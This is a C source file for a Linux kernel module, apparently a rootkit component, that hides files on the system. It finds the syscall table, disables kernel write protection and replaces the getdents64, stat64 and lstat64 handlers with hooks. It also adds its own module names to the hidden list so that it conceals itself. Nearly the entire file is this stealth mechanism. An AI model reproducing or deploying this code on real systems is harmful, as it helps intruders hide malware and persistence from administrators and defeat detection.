#include <linux/module.h>
#include <linux/init.h>
#include <linux/unistd.h>
#include <linux/miscdevice.h>

#include "syscalls.h"
#include "functs.h"
#include "list.h"
#include "cdev.h"

MODULE_AUTHOR("0xe7, 0x1e");
MODULE_DESCRIPTION("Hide files on the system");
MODULE_LICENSE("GPL");

void **sys_call_table;

static int __init hidefiles_init(void)
{
	sys_call_table = find_sys_call_table();
	if(sys_call_table == NULL)
		return 1;
	original_getdents64 = sys_call_table[__NR_getdents64];
	original_stat64 = sys_call_table[__NR_stat64];
	original_lstat64 = sys_call_table[__NR_lstat64];

	disable_write_protection();
	sys_call_table[__NR_getdents64] = sys_getdents64_hook;
	sys_call_table[__NR_stat64] = stat64_hook;
	sys_call_table[__NR_lstat64] = lstat64_hook;
	enable_write_protection();
	misc_register(&dev_misc_device);
	addfile("hidefiles");
	addfile("hidefiles.ko");
	return 0;
}

static void __exit hidefiles_exit(void)
{
	disable_write_protection();
	sys_call_table[__NR_getdents64] = original_getdents64;
	sys_call_table[__NR_stat64] = original_stat64;
	sys_call_table[__NR_lstat64] = original_lstat64;
	enable_write_protection();
	misc_deregister(&dev_misc_device);
	emptylist();
	return;
}

module_init(hidefiles_init);
module_exit(hidefiles_exit);
